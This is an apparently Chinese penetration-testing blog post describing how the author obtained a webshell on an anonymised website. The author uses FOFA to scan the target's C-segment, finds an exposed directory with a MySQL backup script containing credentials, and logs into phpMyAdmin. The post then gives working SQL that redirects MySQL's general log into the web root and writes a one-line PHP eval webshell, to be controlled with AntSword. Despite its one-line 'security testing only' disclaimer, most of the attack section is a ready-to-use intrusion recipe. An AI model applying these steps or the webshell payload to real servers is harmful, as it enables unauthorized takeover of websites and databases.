【渗透实战系列】|17-巧用fofa对目标网站进行getshell

共 1069字,需浏览 3分钟

 ·

2021-07-28 01:58

涉及知识点:

信息搜集目标网站IP利用fofa对目标ip的c段进行搜索发现数据库备份文件和管理界面登录数据库页面,进行写马写马成功,获取webshell

声明:本文仅用于安全测试。


1、目标测试网站地址aa.bb.com

通过信息搜集获取到,该网站地址为ipw为x.x.x.x

2、fofa对目标地址C段进扫描

fofa输入关键字ip=“x.x.x.0/24”进行搜索,意外发现c段开着8090端口的地址



   3、打开http://x.x.x.x:8090发现遍历文件目录,且意外发现数据库备份软件和mysql管理页面                    


打开数据库备份文件mysqlbackup.bat发现账户和密码

打开mysql管理页面

http://x.x.x.x/MySQL/ 发现为phpMyAdmin管理页面,利用备份文件获取的账户和密码顺利登录

4、phpMyAdmin写马

phpmyadmin后台getshell的常用手段有以下几种方式:

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell


执行以下sql语句

 show variables like '%secure%';


发现没有写入权限,无法用select into outfile方法写入shell。我们再来看一下第二种方法,利用全局变量general_log去getshell

我们将全局日志开启并将保存日志的目录设为web目录

 set global general_log=on;# 开启日志  set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 设置日志位置为网站目录

设置成功

此时执行如下语句即可写入webshell到hack.php中

 select '<?php eval($_POST[whoami]); ?>'

用蚁剑连接即可


浏览 4
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报